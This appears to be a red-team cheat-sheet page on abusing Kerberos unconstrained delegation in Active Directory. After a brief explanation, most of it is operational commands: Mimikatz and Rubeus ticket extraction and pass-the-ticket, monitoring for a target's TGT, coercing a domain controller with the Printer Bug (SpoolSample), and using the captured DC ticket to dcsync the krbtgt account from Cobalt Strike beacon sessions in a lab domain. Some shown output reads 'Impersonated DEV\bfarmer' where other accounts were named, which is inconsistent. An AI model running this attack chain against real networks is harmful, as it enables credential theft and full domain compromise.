Unconstrained Delegation

When Kerberos Unconstrained Delegation is enabled on the server hosting the service specified in the Service Principal Name referenced in the TGS-REQ (step 3), the Domain Controller the DC places a copy of the userās TGT into the service ticket. When the userās service ticket (TGS) is provided to the server for service access, the server opens the TGS and places the userās TGT into LSASS for later use. The Application Server can now impersonate that user without limitation!

# Verify
Get-DomainComputer -Unconstrained | select cn
# Mimikatz
sekurlsa::tickets /export
kerberos::ptt ticket.kirbi
# Rubeus
Rubeus.exe dump
Rubeus.exe ptt /ticket:<TICKET>
# Rubeus Monitoring
execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe monitor /targetuser:nlamb /interval:10
# Create Session and Pass Ticket
beacon> make_token DEV\nlamb FakePass
[+] Impersonated DEV\bfarmer
beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\nlamb.kirbi
beacon> ls \\dc-2\c$
Printer Bug
# https://github.com/leechristensen/SpoolSample
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Debug\Rubeus.exe monitor /targetuser:DC-2$ /interval:10 /nowrap
beacon> execute-assembly C:\Tools\SpoolSample\SpoolSample\bin\Debug\SpoolSample.exe dc-2 srv-1
PS> [System.IO.File]::WriteAllBytes("C:\tik.kirbi", [System.Convert]::FromBase64String("ticket-hash"))
beacon> make_token DEV\DC-2$ FakePass
[+] Impersonated DEV\bfarmer
beacon> kerberos_ticket_use C:\Users\Administrator\Desktop\dc-2.kirbi
beacon> dcsync dev.cyberbotic.io DEV\krbtgt
Last updated